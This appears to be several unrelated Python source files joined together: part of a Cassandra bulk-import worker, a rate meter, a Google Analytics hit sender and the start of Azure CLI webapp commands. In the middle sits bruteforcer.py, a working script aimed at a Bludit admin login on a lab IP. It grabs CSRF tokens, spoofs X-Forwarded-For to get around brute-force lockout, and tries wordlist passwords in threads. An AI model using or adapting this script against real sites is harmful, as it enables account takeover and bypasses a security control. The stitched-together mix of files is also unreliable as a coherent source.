self._session = cluster.connect(self.ks)
self._session.default_timeout = self.request_timeout
return self._session
def run(self):
if self.coverage:
self.start_coverage()
try:
pr = profile_on() if PROFILE_ON else None
self.on_fork()
self.inner_run(*self.make_params())
if pr:
profile_off(pr, file_name='worker_profile_%d.txt' % (os.getpid(),))
except Exception as exc:
self.report_error(exc)
finally:
if self.coverage:
self.stop_coverage()
self.close()
def close(self):
if self._session:
self._session.cluster.shutdown()
ChildProcess.close(self)
def is_counter(self, table_meta):
return "counter" in [table_meta.columns[name].cql_type for name in self.valid_columns]
def make_params(self):
metadata = self.session.cluster.metadata
table_meta = metadata.keyspaces[self.ks].tables[self.table]
prepared_statement = None
if self.is_counter(table_meta):
query = 'UPDATE %s.%s SET %%s WHERE %%s' % (protect_name(self.ks), protect_name(self.table))
make_statement = self.wrap_make_statement(self.make_counter_batch_statement)
elif self.use_prepared_statements:
query = 'INSERT INTO %s.%s (%s) VALUES (%s)' % (protect_name(self.ks),
protect_name(self.table),
', '.join(protect_names(self.valid_columns),),
', '.join(['?' for _ in self.valid_columns]))
if self.ttl >= 0:
query += ' USING TTL %s' % (self.ttl,)
query = self.session.prepare(query)
query.consistency_level = self.consistency_level
prepared_statement = query
make_statement = self.wrap_make_statement(self.make_prepared_batch_statement)
else:
query = 'INSERT INTO %s.%s (%s) VALUES (%%s)' % (protect_name(self.ks),
protect_name(self.table),
', '.join(protect_names(self.valid_columns),))
if self.ttl >= 0:
query += ' USING TTL %s' % (self.ttl,)
make_statement = self.wrap_make_statement(self.make_non_prepared_batch_statement)
query = ensure_str(query)
conv = ImportConversion(self, table_meta, prepared_statement)
tm = TokenMap(self.ks, self.hostname, self.local_dc, self.session)
return query, conv, tm, make_statement
def inner_run(self, query, conv, tm, make_statement):
"""
Main run method. Note that we bind self methods that are called inside loops
for performance reasons.
"""
self.query = query
self.conv = conv
self.make_statement = make_statement
convert_rows = self.convert_rows
split_into_batches = self.split_into_batches
result_callback = self.result_callback
err_callback = self.err_callback
session = self.session
while True:
chunk = self.inmsg.recv()
if chunk is None:
break
try:
chunk['rows'] = convert_rows(conv, chunk)
for replicas, batch in split_into_batches(chunk, conv, tm):
statement = make_statement(query, conv, chunk, batch, replicas)
if statement:
future = session.execute_async(statement)
future.add_callbacks(callback=result_callback, callback_args=(batch, chunk),
errback=err_callback, errback_args=(batch, chunk, replicas))
# there is deliberately no else branch: if a statement could not be created, the exception is
# handled in self.wrap_make_statement and the error is reported there. If an injected test failure
# causes the statement to be None, we should not report the error, so that we can test
# how the parent process handles missing batches from child processes
except Exception as exc:
self.report_error(exc, chunk, chunk['rows'])
def wrap_make_statement(self, inner_make_statement):
def make_statement(query, conv, chunk, batch, replicas):
try:
return inner_make_statement(query, conv, batch, replicas)
except Exception as exc:
print("Failed to make batch statement: {}".format(exc))
self.report_error(exc, chunk, batch['rows'])
return None
def make_statement_with_failures(query, conv, chunk, batch, replicas):
failed_batch, apply_failure = self.maybe_inject_failures(batch)
if apply_failure:
return failed_batch
return make_statement(query, conv, chunk, batch, replicas)
return make_statement_with_failures if self.test_failures else make_statement
def make_counter_batch_statement(self, query, conv, batch, replicas):
statement = BatchStatement(batch_type=BatchType.COUNTER, consistency_level=self.consistency_level)
statement.replicas = replicas
statement.keyspace = self.ks
for row in batch['rows']:
where_clause = []
set_clause = []
for i, value in enumerate(row):
if i in conv.primary_key_indexes:
where_clause.append(ensure_text("{}={}").format(self.valid_columns[i], ensure_text(value)))
else:
set_clause.append(ensure_text("{}={}+{}").format(self.valid_columns[i], self.valid_columns[i], ensure_text(value)))
full_query_text = query % (ensure_text(',').join(set_clause), ensure_text(' AND ').join(where_clause))
statement.add(ensure_str(full_query_text))
return statement
def make_prepared_batch_statement(self, query, _, batch, replicas):
"""
Return a batch statement. This is an optimized version of:
statement = BatchStatement(batch_type=BatchType.UNLOGGED, consistency_level=self.consistency_level)
for row in batch['rows']:
statement.add(query, row)
We could optimize further by removing bound_statements altogether but we'd have to duplicate much
more of the driver's code (BoundStatement.bind()).
"""
statement = BatchStatement(batch_type=BatchType.UNLOGGED, consistency_level=self.consistency_level)
statement.replicas = replicas
statement.keyspace = self.ks
statement._statements_and_parameters = [(True, query.query_id, query.bind(r).values) for r in batch['rows']]
return statement
def make_non_prepared_batch_statement(self, query, _, batch, replicas):
statement = BatchStatement(batch_type=BatchType.UNLOGGED, consistency_level=self.consistency_level)
statement.replicas = replicas
statement.keyspace = self.ks
field_sep = b',' if six.PY2 else ','
statement._statements_and_parameters = [(False, query % (field_sep.join(r),), ()) for r in batch['rows']]
return statement
def convert_rows(self, conv, chunk):
"""
Return converted rows and report any errors during conversion.
"""
def filter_row_values(row):
return [v for i, v in enumerate(row) if i not in self.skip_column_indexes]
if self.skip_column_indexes:
rows = [filter_row_values(r) for r in list(csv.reader(chunk['rows'], **self.dialect_options))]
else:
rows = list(csv.reader(chunk['rows'], **self.dialect_options))
errors = defaultdict(list)
def convert_row(r):
try:
return conv.convert_row(r)
except Exception as err:
errors[err.message if hasattr(err, 'message') else str(err)].append(r)
return None
converted_rows = [_f for _f in [convert_row(r) for r in rows] if _f]
if errors:
for msg, rows in errors.items():
self.report_error(ParseError(msg), chunk, rows)
return converted_rows
def maybe_inject_failures(self, batch):
"""
Examine self.test_failures and see if the batch is a batch
supposed to cause a failure (failing_batch), or to terminate the worker process
(exit_batch), or not to be sent (unsent_batch).
@return any statement that will cause a failure or None if the statement should not be sent
plus a boolean indicating if a failure should be applied at all
"""
if 'failing_batch' in self.test_failures:
failing_batch = self.test_failures['failing_batch']
if failing_batch['id'] == batch['id']:
if batch['attempts'] < failing_batch['failures']:
statement = SimpleStatement("INSERT INTO badtable (a, b) VALUES (1, 2)",
consistency_level=self.consistency_level)
return statement, True # use this statement, which will cause an error
if 'exit_batch' in self.test_failures:
exit_batch = self.test_failures['exit_batch']
if exit_batch['id'] == batch['id']:
sys.exit(1)
if 'unsent_batch' in self.test_failures:
unsent_batch = self.test_failures['unsent_batch']
if unsent_batch['id'] == batch['id']:
return None, True # do not send this batch, which will cause missing acks in the parent process
return None, False # carry on as normal, do not apply any failures
@staticmethod
def make_batch(batch_id, rows, attempts=1):
return {'id': batch_id, 'rows': rows, 'attempts': attempts}
def split_into_batches(self, chunk, conv, tm):
"""
Batch rows by ring position or replica.
If there are at least min_batch_size rows for a ring position then split these rows into
groups of max_batch_size and send a batch for each group, using all replicas for this ring position.
Otherwise, we are forced to batch by replica, and unfortunately we can then only pick one replica per
batch in order to guarantee a replica that is common to all partition keys in the batch. We are typically able
to batch by ring position for small clusters or when VNODES are not used. For large clusters with VNODES
it may not be possible; in that case it helps to increase the CHUNK SIZE, but only up to a limit, otherwise
we may choke the cluster.
"""
rows_by_ring_pos = defaultdict(list)
errors = defaultdict(list)
min_batch_size = self.min_batch_size
max_batch_size = self.max_batch_size
ring = tm.ring
get_row_partition_key_values = conv.get_row_partition_key_values_fcn()
pk_to_token_value = tm.pk_to_token_value
get_ring_pos = tm.get_ring_pos
make_batch = self.make_batch
for row in chunk['rows']:
try:
pk = get_row_partition_key_values(row)
rows_by_ring_pos[get_ring_pos(ring, pk_to_token_value(pk))].append(row)
except Exception as e:
errors[e.message if hasattr(e, 'message') else str(e)].append(row)
if errors:
for msg, rows in errors.items():
self.report_error(ParseError(msg), chunk, rows)
replicas = tm.replicas
filter_replicas = tm.filter_replicas
rows_by_replica = defaultdict(list)
for ring_pos, rows in rows_by_ring_pos.items():
if len(rows) > min_batch_size:
for i in range(0, len(rows), max_batch_size):
yield filter_replicas(replicas[ring_pos]), make_batch(chunk['id'], rows[i:i + max_batch_size])
else:
# select only the first valid replica to guarantee more overlap or none at all
rows_by_replica[tuple(filter_replicas(replicas[ring_pos])[:1])].extend(rows) # TODO: revisit tuple wrapper
# Now send the batches by replica
for replicas, rows in rows_by_replica.items():
for i in range(0, len(rows), max_batch_size):
yield replicas, make_batch(chunk['id'], rows[i:i + max_batch_size])
def result_callback(self, _, batch, chunk):
self.update_chunk(batch['rows'], chunk)
def err_callback(self, response, batch, chunk, replicas):
if isinstance(response, OperationTimedOut) and chunk['imported'] == chunk['num_rows_sent']:
return # occasionally the driver sends false timeouts for rows already processed (PYTHON-652)
err_is_final = batch['attempts'] >= self.max_attempts
self.report_error(response, chunk, batch['rows'], batch['attempts'], err_is_final)
if not err_is_final:
batch['attempts'] += 1
statement = self.make_statement(self.query, self.conv, chunk, batch, replicas)
future = self.session.execute_async(statement)
future.add_callbacks(callback=self.result_callback, callback_args=(batch, chunk),
errback=self.err_callback, errback_args=(batch, chunk, replicas))
def report_error(self, err, chunk=None, rows=None, attempts=1, final=True):
if self.debug and sys.exc_info()[1] == err:
traceback.print_exc()
err_msg = err.message if hasattr(err, 'message') else str(err)
self.outmsg.send(ImportTaskError(err.__class__.__name__, err_msg, rows, attempts, final))
if final and chunk is not None:
self.update_chunk(rows, chunk)
def update_chunk(self, rows, chunk):
chunk['imported'] += len(rows)
if chunk['imported'] == chunk['num_rows_sent']:
self.outmsg.send(ImportProcessResult(chunk['num_rows_sent']))
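# Hedged, self-contained sketch (added for illustration, not part of the original module):
# the grouping performed by split_into_batches above, reduced to plain dicts. Ring positions
# holding more than min_batch_size rows are batched per position with all of their replicas;
# the remaining rows fall back to batching by their first replica only.
def _example_grouping(rows_with_pos, replicas_by_pos, min_batch_size=2, max_batch_size=3):
    from collections import defaultdict
    rows_by_pos = defaultdict(list)
    for pos, row in rows_with_pos:
        rows_by_pos[pos].append(row)
    batches = []
    rows_by_replica = defaultdict(list)
    for pos, rows in rows_by_pos.items():
        if len(rows) > min_batch_size:
            # enough rows for this ring position: batch per position, keep all replicas
            for i in range(0, len(rows), max_batch_size):
                batches.append((replicas_by_pos[pos], rows[i:i + max_batch_size]))
        else:
            # too few rows: fall back to the first replica only, so batches can be merged
            rows_by_replica[tuple(replicas_by_pos[pos][:1])].extend(rows)
    for replicas, rows in rows_by_replica.items():
        for i in range(0, len(rows), max_batch_size):
            batches.append((list(replicas), rows[i:i + max_batch_size]))
    return batches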
class RateMeter(object):
def __init__(self, log_fcn, update_interval=0.25, log_file=''):
self.log_fcn = log_fcn # the function for logging, may be None to disable logging
self.update_interval = update_interval # how often we update in seconds
self.log_file = log_file # an optional file where to log statistics in addition to stdout
self.start_time = time.time() # the start time
self.last_checkpoint_time = self.start_time # last time we logged
self.current_rate = 0.0 # rows per second
self.current_record = 0 # number of records since we last updated
self.total_records = 0 # total number of records
if os.path.isfile(self.log_file):
os.unlink(self.log_file)
def increment(self, n=1):
self.current_record += n
self.maybe_update()
def maybe_update(self, sleep=False):
if self.current_record == 0:
return
new_checkpoint_time = time.time()
time_difference = new_checkpoint_time - self.last_checkpoint_time
if time_difference >= self.update_interval:
self.update(new_checkpoint_time)
self.log_message()
elif sleep:
remaining_time = self.update_interval - time_difference
if remaining_time > 0.000001:
time.sleep(remaining_time)
def update(self, new_checkpoint_time):
time_difference = new_checkpoint_time - self.last_checkpoint_time
if time_difference >= 1e-09:
self.current_rate = self.get_new_rate(self.current_record / time_difference)
self.last_checkpoint_time = new_checkpoint_time
self.total_records += self.current_record
self.current_record = 0
def get_new_rate(self, new_rate):
"""
return the rate of the last period: this is the new rate but
averaged with the last rate to smooth a bit
"""
if self.current_rate == 0.0:
return new_rate
else:
return (self.current_rate + new_rate) / 2.0
def get_avg_rate(self):
"""
return the average rate since we started measuring
"""
time_difference = time.time() - self.start_time
return self.total_records / time_difference if time_difference >= 1e-09 else 0
def log_message(self):
if not self.log_fcn:
return
output = 'Processed: %d rows; Rate: %7.0f rows/s; Avg. rate: %7.0f rows/s' % \
(self.total_records, self.current_rate, self.get_avg_rate())
self.log_fcn(output, eol='\r')
if self.log_file:
with open(self.log_file, "a") as f:
f.write(output + '\n')
def get_total_records(self):
self.update(time.time())
self.log_message()
return self.total_records
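# Hedged usage sketch (added for illustration, not part of the original module): give
# RateMeter a log function that accepts an 'eol' keyword argument and report records as
# they arrive; per-period rates are smoothed by averaging with the previous rate.
def _example_rate_meter():
    meter = RateMeter(log_fcn=lambda msg, eol='\n': print(msg, end=eol), update_interval=0.25)
    for _ in range(10000):
        meter.increment()
    return meter.get_total_records()  # flushes the last period and logs a final line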
|
bruteforcer.py
|
#!/usr/bin/env python3
'''
Original Author --> https://rastating.github.io/bludit-brute-force-mitigation-bypass/
This is just a fixed version of the above script, so I am not taking
any credit for the original CVE or this vulnerability. Thank you.
'''
import re, sys
import requests, threading
if len(sys.argv) < 2:
print("Invalid syntax !")
print("Usage : python bruteforcer.py <user1> <user2>")
exit(1)
login_url = 'http://10.10.10.191/admin/login'
def BruteForce(username):
print("[+]: Brute Forcing username : ", username, " ...")
with open("passwords.txt") as proto:
for password in proto:
password = password.rstrip('\n') # strip the trailing newline from the wordlist entry
session = requests.Session()
login_page = session.get(login_url)
csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
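# Note (added for clarity): Bludit's brute-force mitigation blacklists clients by the
# X-Forwarded-For header, so supplying a fresh value on every attempt (here, the password
# candidate itself) sidesteps the lockout.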
headers = {
'X-Forwarded-For': password,
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
'Referer': login_url
}
data = {
'tokenCSRF': csrf_token,
'username': username,
'password': password,
'save': ''
}
login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)
if 'location' in login_result.headers:
if '/admin/dashboard' in login_result.headers['location']:
print()
print('SUCCESS: Password found!')
print('Use {u}: --> {p} <---'.format(u = username, p = password))
print()
break
for user in sys.argv[1:]:
threading.Thread(target=BruteForce, args=[user]).start()
|
sender.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import time
from threading import Thread
from requests import Request, Session
from .. import DEFER_METHOD_THREADED, DEFER_METHOD_CELERY
from ..exceptions import SenderException
from . import COLLECT_PATH, DEBUG_PATH, HTTP_URL, SSL_URL, GET_SIZE_LIMIT, POST_SIZE_LIMIT
from .debug import process_debug_response
class AnalyticsSender(object):
"""
Sends predefined data to Google Analytics, either through a ``GET`` or a ``POST``.
:param session: Session object.
:type session: requests.sessions.Session
:param ssl: Use the HTTPS base URL.
:type ssl: bool
:param debug: Only debug hits. They are returned with debug information but not processed by GA.
:type debug: bool
:param default_method: Default method to use for sending. Default is ``GET``. Change to ``POST`` if you always
expect large payloads. Otherwise, it is fine leaving ``post_fallback`` set to ``True``.
:type default_method: unicode | str
:param post_fallback: If the request size is over 2000 bytes, automatically make a ``POST`` request instead of
``GET``.
:type post_fallback: bool
:param timeout: Timeout for sending a request, in seconds. Can also be a tuple for specifying connect and read
timeout separately.
:type timeout: int | (int, int)
"""
def __init__(self, session, ssl=True, debug=False, default_method='GET', post_fallback=True, timeout=10):
self._debug = debug
self._ssl = ssl
root_url = SSL_URL if ssl else HTTP_URL
if debug:
self._base_url = '{0}{1}{2}'.format(root_url, DEBUG_PATH, COLLECT_PATH)
session.hooks['response'].append(process_debug_response)
else:
self._base_url = '{0}{1}'.format(root_url, COLLECT_PATH)
self._root_url_len = len(root_url)
self._base_url_len = len(self._base_url)
self._session = session
self._timeout = timeout
self.send = getattr(self, default_method.lower())
self._post_fallback = post_fallback
def get(self, request_params):
"""
Sends a hit to GA via a GET-request.
:param request_params: URL parameters.
:type request_params: dict
:return: A response object.
:rtype: requests.models.Response
"""
req = Request('GET', self._base_url, params=request_params)
p_req = self._session.prepare_request(req)
if len(p_req.url) - self._root_url_len > GET_SIZE_LIMIT:
if self._post_fallback:
return self.post(p_req.url[self._base_url_len+1:])
raise SenderException("Request is too large for GET method and POST fallback is deactivated:",
len(p_req.url))
return self._session.send(p_req, timeout=self._timeout)
def post(self, request_data):
"""
Sends a hit to GA via a POST-request.
:param request_data: POST payload.
:type request_data: dict
:return: A response object.
:rtype: requests.models.Response
"""
req = Request('POST', self._base_url, data=request_data)
p_req = self._session.prepare_request(req)
if len(p_req.body) > POST_SIZE_LIMIT:
raise SenderException("Request is too large for POST method:",
len(p_req.body))
return self._session.send(p_req, timeout=self._timeout)
def send(self, request_params):
"""
Assigned to default method as set during instantiation.
"""
pass
@property
def session(self):
return self._session
def get_send_function(defer, **kwargs):
if defer == DEFER_METHOD_CELERY:
try:
from .tasks import send_hit
except ImportError:
send_hit = None
raise ValueError("Celery is not available.")
def _send_func(request_params):
send_hit.apply_async(args=(request_params, time.time()))
return _send_func
sender = AnalyticsSender(Session(), **kwargs)
if defer == DEFER_METHOD_THREADED:
def _send_func(request_params):
Thread(target=sender.send, args=(request_params, )).start()
return _send_func
return sender.send
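# Hedged usage sketch (added for illustration, not part of the original module): build a
# threaded send function and push one Measurement Protocol pageview hit; 'UA-XXXXXX-Y' is
# a placeholder tracking id.
def _example_send_pageview():
    send = get_send_function(DEFER_METHOD_THREADED, debug=True)
    send({'v': 1, 'tid': 'UA-XXXXXX-Y', 'cid': '555', 't': 'pageview', 'dp': '/home'})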
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import threading
import time
import ast
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from binascii import hexlify
from os import urandom
import datetime
import json
import ssl
import sys
import uuid
from six.moves.urllib.request import urlopen # pylint: disable=import-error, ungrouped-imports
import OpenSSL.crypto
from fabric import Connection
from knack.prompting import prompt_pass, NoTTYException
from knack.util import CLIError
from knack.log import get_logger
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.web.models import (Site, SiteConfig, User, AppServicePlan, SiteConfigResource,
SkuDescription, SslState, HostNameBinding, NameValuePair,
BackupRequest, DatabaseBackupSetting, BackupSchedule,
RestoreRequest, FrequencyUnit, Certificate, HostNameSslState,
HybridConnection, RampUpRule, UnauthenticatedClientAction,
ManagedServiceIdentity, DeletedAppRestoreRequest,
DefaultErrorResponseException, SnapshotRestoreRequest,
SnapshotRecoverySource, SwiftVirtualNetwork, HostingEnvironmentProfile)
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.mgmt.relay.models import AccessRights
from azure.cli.command_modules.relay._client_factory import hycos_mgmt_client_factory, namespaces_mgmt_client_factory
from azure.storage.blob import BlockBlobService, BlobPermissions
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.mgmt.network.models import Delegation
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object, \
ConfiguredDefaultSetter, sdk_no_wait
from azure.cli.core.commands.client_factory import UA_AGENT
from .tunnel import TunnelServer
from .vsts_cd_provider import VstsContinuousDeliveryProvider
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES, LINUX_RUNTIMES, WINDOWS_RUNTIMES
from ._client_factory import web_client_factory, ex_handler_factory
from ._appservice_utils import _generic_site_operation
from .utils import _normalize_sku, get_sku_name
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group, get_app_details,
should_create_new_rg, set_location, does_app_already_exist, get_profile_username,
get_plan_to_use, get_lang_from_content, get_rg_to_use, get_sku_to_use,
detect_os_form_src)
from ._constants import (RUNTIME_TO_DEFAULT_VERSION, NODE_VERSION_DEFAULT_FUNCTIONAPP,
RUNTIME_TO_IMAGE_FUNCTIONAPP, NODE_VERSION_DEFAULT)
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities"
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None, # pylint: disable=too-many-statements,too-many-branches
deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
deployment_local_git=None, docker_registry_server_password=None, docker_registry_server_user=None,
multicontainer_config_type=None, multicontainer_config_file=None, tags=None,
using_webapp_up=False, language=None):
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
client = web_client_factory(cmd.cli_ctx)
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
is_linux = plan_info.reserved
node_default_version = NODE_VERSION_DEFAULT
location = plan_info.location
site_config = SiteConfig(app_settings=[])
if isinstance(plan_info.sku, SkuDescription) and plan_info.sku.name.upper() not in ['F1', 'FREE', 'SHARED', 'D1',
'B1', 'B2', 'B3', 'BASIC']:
site_config.always_on = True
webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags,
https_only=using_webapp_up)
helper = _StackRuntimeHelper(client, linux=is_linux)
if is_linux:
if not validate_container_app_create_options(runtime, deployment_container_image_name,
multicontainer_config_type, multicontainer_config_file):
raise CLIError("usage error: --runtime | --deployment-container-image-name |"
" --multicontainer-config-type TYPE --multicontainer-config-file FILE")
if startup_file:
site_config.app_command_line = startup_file
if runtime:
site_config.linux_fx_version = runtime
match = helper.resolve(runtime)
if not match:
raise CLIError("Linux Runtime '{}' is not supported."
"Please invoke 'list-runtimes' to cross check".format(runtime))
elif deployment_container_image_name:
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
value="false"))
elif multicontainer_config_type and multicontainer_config_file:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
elif plan_info.is_xenon: # windows container webapp
site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
elif runtime: # windows webapp with runtime specified
if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
raise CLIError("usage error: --startup-file or --deployment-container-image-name or "
"--multicontainer-config-type and --multicontainer-config-file is "
"only appliable on linux webapp")
match = helper.resolve(runtime)
if not match:
raise CLIError("Runtime '{}' is not supported. Please invoke 'list-runtimes' to cross check".format(runtime)) # pylint: disable=line-too-long
match['setter'](match, site_config)
# Be consistent with portal: any windows webapp should have this even if it doesn't have node in the stack
if not match['displayName'].startswith('node'):
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
else: # windows webapp without runtime specified
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
if site_config.app_settings:
for setting in site_config.app_settings:
logger.info('Will set appsetting %s', setting)
if using_webapp_up: # when the routine is invoked as a help method for webapp up
logger.info("will set appsetting for enabling build")
site_config.app_settings.append(NameValuePair(name="SCM_DO_BUILD_DURING_DEPLOYMENT", value=True))
if language is not None and language.lower() == 'dotnetcore':
site_config.app_settings.append(NameValuePair(name='ANCM_ADDITIONAL_ERROR_PAGE_LINK',
value='https://{}.scm.azurewebsites.net/detectors'.format(name)))
poller = client.web_apps.create_or_update(resource_group_name, name, webapp_def)
webapp = LongRunningOperation(cmd.cli_ctx)(poller)
# Ensure SCC operations follow right after the 'create', no precedent appsetting update commands
_set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)
if deployment_container_image_name:
update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password=docker_registry_server_password)
return webapp
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
multicontainer_config_type=None, multicontainer_config_file=None):
if bool(multicontainer_config_type) != bool(multicontainer_config_file):
return False
opts = [runtime, deployment_container_image_name, multicontainer_config_type]
return len([x for x in opts if x]) == 1 # you can only specify one of the combinations
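# Hedged illustration (added, not part of the original module): exactly one of --runtime,
# --deployment-container-image-name, or the --multicontainer-config-type/-file pair may be set.
def _example_validate_container_app_create_options():
    assert validate_container_app_create_options(runtime='PYTHON|3.7')
    assert validate_container_app_create_options(deployment_container_image_name='nginx')
    assert not validate_container_app_create_options(runtime='PYTHON|3.7',
                                                     deployment_container_image_name='nginx')
    assert not validate_container_app_create_options(multicontainer_config_type='COMPOSE')  # file missing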
def parse_docker_image_name(deployment_container_image_name):
if not deployment_container_image_name:
return None
slash_ix = deployment_container_image_name.rfind('/')
docker_registry_server_url = deployment_container_image_name[0:slash_ix]
if slash_ix == -1 or ("." not in docker_registry_server_url and ":" not in docker_registry_server_url):
return None
return docker_registry_server_url
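# Hedged illustration (added, not part of the original module): a registry host is only
# detected when the segment before the last '/' contains a '.' or a ':'.
def _example_parse_docker_image_name():
    assert parse_docker_image_name('myregistry.azurecr.io/nginx:latest') == 'myregistry.azurecr.io'
    assert parse_docker_image_name('localhost:5000/nginx') == 'localhost:5000'
    assert parse_docker_image_name('nginx') is None           # no registry part
    assert parse_docker_image_name('library/nginx') is None   # Docker Hub namespace, not a host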
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_application_settings', slot)
result, slot_result = {}, {}
# pylint: disable=too-many-nested-blocks
for src, dest in [(settings, result), (slot_settings, slot_result)]:
for s in src:
try:
temp = shell_safe_json_parse(s)
if isinstance(temp, list): # a bit messy, but we'd like to accept the output of the "list" command
for t in temp:
if t.get('slotSetting', True):
slot_result[t['name']] = t['value']
# Mark each setting as the slot setting
else:
result[t['name']] = t['value']
else:
dest.update(temp)
except CLIError:
setting_name, value = s.split('=', 1)
dest[setting_name] = value
result.update(slot_result)
for setting_name, value in result.items():
app_settings.properties[setting_name] = value
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
app_settings_slot_cfg_names = []
if slot_result:
new_slot_setting_names = slot_result.keys()
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
slot_cfg_names.app_setting_names += new_slot_setting_names
app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
share_name, access_key, mount_path=None, slot=None, slot_setting=False):
from azure.mgmt.web.models import AzureStorageInfoValue
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
if custom_id in azure_storage_accounts.properties:
raise CLIError("Site already configured with an Azure storage account with the id '{}'. "
"Use 'az webapp config storage-account update' to update an existing "
"Azure storage account configuration.".format(custom_id))
azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name,
share_name=share_name, access_key=access_key,
mount_path=mount_path)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
from azure.mgmt.web.models import AzureStorageInfoValue
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
existing_account_config = azure_storage_accounts.properties.pop(custom_id, None)
if not existing_account_config:
raise CLIError("No Azure storage account configuration found with the id '{}'. "
"Use 'az webapp config storage-account add' to add a new "
"Azure storage account configuration.".format(custom_id))
new_account_config = AzureStorageInfoValue(
type=storage_type or existing_account_config.type,
account_name=account_name or existing_account_config.account_name,
share_name=share_name or existing_account_config.share_name,
access_key=access_key or existing_account_config.access_key,
mount_path=mount_path or existing_account_config.mount_path
)
azure_storage_accounts.properties[custom_id] = new_account_config
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def enable_zip_deploy_functionapp(cmd, resource_group_name, name, src, build_remote=False, timeout=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
app = client.web_apps.get(resource_group_name, name)
parse_plan_id = parse_resource_id(app.server_farm_id)
plan_info = None
retry_delay = 10 # seconds
# We need to retry getting the plan because sometimes if the plan is created as part of function app,
# it can take a couple of tries before it gets the plan
for _ in range(5):
plan_info = client.app_service_plans.get(parse_plan_id['resource_group'],
parse_plan_id['name'])
if plan_info is not None:
break
time.sleep(retry_delay)
